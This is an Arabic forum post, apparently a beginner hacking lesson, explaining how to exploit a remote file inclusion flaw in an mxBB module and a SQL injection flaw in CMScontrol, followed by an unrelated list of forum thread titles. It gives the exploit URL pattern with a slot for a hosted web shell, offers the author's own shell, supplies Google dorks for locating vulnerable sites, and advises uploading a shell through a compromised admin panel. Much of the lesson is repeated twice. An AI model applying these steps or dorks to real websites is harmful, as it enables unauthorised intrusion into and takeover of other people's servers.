السلام عليكم ورحمة الله وبركاته
اليوم أقدم لكم الدرس الثانى حاولت أبسطه للمبتدئين
يتضمن شرح
استغلال 4 أنواع من الثغرات المهمة
- File Include
- Sql Injection
- Upload
- Local File Include
اليوم أقدم لكم الدرس الثانى حاولت أبسطه للمبتدئين
يتضمن شرح
استغلال 4 أنواع من الثغرات المهمة
- File Include
- Sql Injection
- Upload
- Local File Include
ما هي أنواع الثغرات ..!
الثغراات لاتعد ولا تحصى ودلك حسب أنواع الأنظمة مثلا نظام اللينكس أو ويندوز أو ماتريكس
وهنا سنتطرق لثلاث أنواع أساسية في نظام الـ php لانها هي المعممة وهي
1- File Include (ادراج ملف)
ثغرات Remote File Inclusion Vulnerability هي الثغرات التي تسمح لنا بأدراج اكواد PHP على السرفر بكل اختصااار . وبما ان php لغة ديناميكية كما هو معروف فممكن الحاق تغييرات
للسرفر عن طريق الاكواد هذه , اذن بمجرد تطبيق ثغرة Remote File Inclusion يكمننا اختراق السرفر (الحاق تغييرات للسرفر) .
ممكن ايجاد هذه الثغرات في مواقع security المتعددة و سوف اشرح لكم 1 منهم وهو القلق
[size=21]تمام الان نشوف الثغرة
mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
طبعا هذة اسم السكربت المصاب ونوع الثغرة
الثغراات لاتعد ولا تحصى ودلك حسب أنواع الأنظمة مثلا نظام اللينكس أو ويندوز أو ماتريكس
وهنا سنتطرق لثلاث أنواع أساسية في نظام الـ php لانها هي المعممة وهي
1- File Include (ادراج ملف)
ثغرات Remote File Inclusion Vulnerability هي الثغرات التي تسمح لنا بأدراج اكواد PHP على السرفر بكل اختصااار . وبما ان php لغة ديناميكية كما هو معروف فممكن الحاق تغييرات
للسرفر عن طريق الاكواد هذه , اذن بمجرد تطبيق ثغرة Remote File Inclusion يكمننا اختراق السرفر (الحاق تغييرات للسرفر) .
ممكن ايجاد هذه الثغرات في مواقع security المتعددة و سوف اشرح لكم 1 منهم وهو القلق
[size=21]تمام الان نشوف الثغرة
mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
طبعا هذة اسم السكربت المصاب ونوع الثغرة
[size=21]Discovered by bd0rk || SOH-Crew
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
The german Coding and IT-Security Ressource
وهذة المكتشف وموقعه وبيانات عنه طبعا مابلزمنا
Vendor: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Download: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا هنا الموقع الرسمى لسكربت
وصفحة تحميل السكربت لو بدك تنزله وتفحصه تتاكد
Vulnerable Code in contrib/mx_glance_sdesc.php line 89
مساء الخطأ فى أى مجلد وأى ملف
include_once($mx_root_path . 'includes/mx_functions_tools.'.$phpEx);
[size=21][b]الخطأ البرمجى الموجود
[size=21][b]الان نيجى للمهم كثير
[+]Exploit: /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]]
أنت لمن تشوف ثغرة دور على المهم الى هوى
Exploit
الى هوى الأستغلال
الان نيجى لاستغلال نزبطه اكثر
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تبدله برابط الموقع المصاب
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][p4th]
وهذة تبدله بمجلد السكربت المرفوع
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode]contrib/mx_glance_sdesc.php?mx_root_path=
وهذا الاستغلال
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ShellCode]
وهذة نشيله ونحط رابط شل بصيغة txt
مثال انا رافع شل
بامكانكم تستخدموه
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
يعنى يصير الاستغلال جاهز
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
ولا ننسى أخر الاستغلال نضع علامة ؟
الا نيجى للبحث عن السكربت
ممكن تكتب اسم السكربت بجوجل مع أضافة
powered by ااسم السكربت
powered by mxBB Module
او نحط اخر شى من الاستغلال مع اضافة
allinurl:
allinurl: "mx_glance_sdesc.php?mx_root_path"
الان نشوف معى موقع مصاب حطيت الاستغلال لهوى شبك معى الشل
طبعا زى مانتوا عارفين
Software: CMScontrol (Content Management Portal Solutions) Sql Injection
أسم السكربت ونوع الثغرة
Version: 7.*
الاصدار السكربت المصاب
Vulnerability: Remote Sql Injection
نوع الثغرة
Google Dork: "index.php?id_menu=" CMScontrol
وهذا دورك البحث وهوى مهم جدا جدا
Off. site: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
موقع السكربت
#=Author========================================== ====#
# Author: ph1l1ster #
# Date: 20.09.2009 #
# Contact: icq: 612672 | email: #
معلومات عن المكتشف
Exploit: طبعا هاى تدل على الاستغلال الى جمبها بكون الاستغلال على سريع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Live demo: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وهذا موقع مصاب وضعه المكتشف
Login page: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[b]وهذا مسار اللوحة لل السكربت يعنى لو وجدت موقع مصاب وطلعت اليوزر والباس تبعه تقدر تفوت اللوحة من خل هل مسار]
وترفع شل منها بإذن الله
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
The german Coding and IT-Security Ressource
وهذة المكتشف وموقعه وبيانات عنه طبعا مابلزمنا
Vendor: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Download: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا هنا الموقع الرسمى لسكربت
وصفحة تحميل السكربت لو بدك تنزله وتفحصه تتاكد
Vulnerable Code in contrib/mx_glance_sdesc.php line 89
مساء الخطأ فى أى مجلد وأى ملف
include_once($mx_root_path . 'includes/mx_functions_tools.'.$phpEx);
[size=21][b]الخطأ البرمجى الموجود
[size=21][b]الان نيجى للمهم كثير
[+]Exploit: /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]]
أنت لمن تشوف ثغرة دور على المهم الى هوى
Exploit
الى هوى الأستغلال
الان نيجى لاستغلال نزبطه اكثر
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تبدله برابط الموقع المصاب
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][p4th]
وهذة تبدله بمجلد السكربت المرفوع
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode]contrib/mx_glance_sdesc.php?mx_root_path=
وهذا الاستغلال
/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ShellCode]
وهذة نشيله ونحط رابط شل بصيغة txt
مثال انا رافع شل
بامكانكم تستخدموه
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
يعنى يصير الاستغلال جاهز
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
ولا ننسى أخر الاستغلال نضع علامة ؟
الا نيجى للبحث عن السكربت
ممكن تكتب اسم السكربت بجوجل مع أضافة
powered by ااسم السكربت
powered by mxBB Module
او نحط اخر شى من الاستغلال مع اضافة
allinurl:
allinurl: "mx_glance_sdesc.php?mx_root_path"
الان نشوف معى موقع مصاب حطيت الاستغلال لهوى شبك معى الشل
طبعا زى مانتوا عارفين
Software: CMScontrol (Content Management Portal Solutions) Sql Injection
أسم السكربت ونوع الثغرة
Version: 7.*
الاصدار السكربت المصاب
Vulnerability: Remote Sql Injection
نوع الثغرة
Google Dork: "index.php?id_menu=" CMScontrol
وهذا دورك البحث وهوى مهم جدا جدا
Off. site: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
موقع السكربت
#=Author========================================== ====#
# Author: ph1l1ster #
# Date: 20.09.2009 #
# Contact: icq: 612672 | email: #
معلومات عن المكتشف
Exploit: طبعا هاى تدل على الاستغلال الى جمبها بكون الاستغلال على سريع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Live demo: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وهذا موقع مصاب وضعه المكتشف
Login page: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[b]وهذا مسار اللوحة لل السكربت يعنى لو وجدت موقع مصاب وطلعت اليوزر والباس تبعه تقدر تفوت اللوحة من خل هل مسار]
وترفع شل منها بإذن الله
6/8/2023, 9:34 pm من طرف روان علي شريف
» أنا بهذه اللحظة
10/28/2021, 8:01 am من طرف جاك
» على الرصيف
6/13/2020, 5:40 pm من طرف روان علي شريف
» بوابة الجحيم
6/13/2020, 4:58 pm من طرف روان علي شريف
» الكاتب علي شريف روان في حوار لـ"الديوان"
6/28/2019, 5:05 pm من طرف روان علي شريف
» فردوس مليندا المفقود.
3/12/2019, 1:20 am من طرف روان علي شريف
» بدري فركوح
3/4/2019, 11:56 pm من طرف المهندس جورج فارس رباحية
» ليلى العفيفة
3/4/2019, 11:52 pm من طرف المهندس جورج فارس رباحية
» مجموعة مؤلفات محمد حسنين هيكل
1/27/2019, 3:42 pm من طرف نبيل اوزاعي
» ألفية العياط فى النحو
11/9/2018, 3:13 am من طرف محمود العياط
» ديوان إنشق القمر
8/14/2018, 2:05 am من طرف محمود العياط
» ديوان بومبا والاقزام
2/25/2018, 3:39 am من طرف محمود العياط
» بريد الموتى
1/23/2018, 2:35 am من طرف روان علي شريف
» ديوان دحش قرم ودانك
12/21/2017, 4:33 am من طرف محمود العياط
» ديوان حادى يابادى يا كرنب زبادى
10/14/2017, 6:21 am من طرف محمود العياط
» من عجائب الأرقام
5/24/2017, 9:36 pm من طرف المهندس جورج فارس رباحية
» ابن الرومي
5/24/2017, 9:20 pm من طرف المهندس جورج فارس رباحية
» قصيدة حبك وقلبى
8/13/2016, 11:05 pm من طرف محمود العياط
» الأعشى الأكبر
6/11/2016, 4:17 pm من طرف المهندس جورج فارس رباحية
» مساء الخير
5/2/2015, 8:40 am من طرف السراب
» مي زيادة
4/22/2015, 11:17 am من طرف المهندس جورج فارس رباحية
» لبيد بن ربيعة
12/28/2014, 4:44 pm من طرف المهندس جورج فارس رباحية
» زهير بن أبي سلمى
12/20/2014, 4:32 am من طرف المهندس جورج فارس رباحية
» جبران خليل جبران
12/5/2014, 2:16 pm من طرف المهندس جورج فارس رباحية
» إيايا أبو ماضي
11/5/2014, 2:09 am من طرف المهندس جورج فارس رباحية
» حمل برنامح تعلم اللغة الانجليزيه على جهازك المحمول
9/11/2014, 10:04 pm من طرف poopy87
» أوبريت ملحمة تحتمس الرابع ولوحة الاحلام
7/28/2014, 9:41 am من طرف محمود العياط
» سيف الفراق
7/22/2014, 2:59 am من طرف محمود العياط
» ديوان اعشقك جدا
7/22/2014, 2:56 am من طرف محمود العياط
» ديوان الحديث مع النفس البشرية
7/22/2014, 2:54 am من طرف محمود العياط
» عمرو بن كلثوم
6/14/2014, 6:02 pm من طرف المهندس جورج فارس رباحية
» طرفة بن العبد
5/28/2014, 5:26 am من طرف المهندس جورج فارس رباحية
» ديوان رصاصة فى قلب الجياد العجوزة
5/20/2014, 10:40 pm من طرف محمود العياط
» شهداء 6 أيار 1916
5/6/2014, 5:45 pm من طرف المهندس جورج فارس رباحية
» الياس قنصل
4/23/2014, 4:20 pm من طرف المهندس جورج فارس رباحية
» زكي قنصل
4/23/2014, 4:18 pm من طرف المهندس جورج فارس رباحية
» فضائية الجزيرة إحدى أسلحة قطر
4/3/2014, 6:05 pm من طرف طالب علي
» إضافة رائعة للفايرفوكس ( ميزة AutoPager ) تجعل كل المواضيع في صفحة واحدة
4/2/2014, 4:47 pm من طرف العـدوي
» محمود درويش مؤلفات ودواوين
3/20/2014, 9:56 pm من طرف wadfay
» حاتم الطائي
3/20/2014, 6:35 pm من طرف المهندس جورج فارس رباحية
» حكمة اليوم
3/2/2014, 6:03 pm من طرف المهندس جورج فارس رباحية
» امرؤ القيس
3/2/2014, 5:55 pm من طرف المهندس جورج فارس رباحية
» محتويات مكتبة الروايات
2/9/2014, 4:26 pm من طرف أريج الورد
» تقديم ديوان رصاصة فى قلب الجياد العجوزة محمود العياط
2/1/2014, 8:33 pm من طرف محمود العياط
» الحارث بن حلزة
1/21/2014, 7:36 pm من طرف المهندس جورج فارس رباحية
» مجموعة من الاغاني النادرة لكاظم الساهر تجدونها عند السراب فقط لا غير
1/19/2014, 10:02 am من طرف mas12ter
» رخصة زواج للمؤجل اداريا
1/8/2014, 9:17 am من طرف anas198510
» الف ليلة وليلة
1/8/2014, 2:01 am من طرف سعيد خليف
» عنترة العبسي
1/5/2014, 6:30 pm من طرف المهندس جورج فارس رباحية
» معجم المصطلحات النفسية انكليزي فرنسي عربي
11/24/2013, 1:33 pm من طرف محمد حمد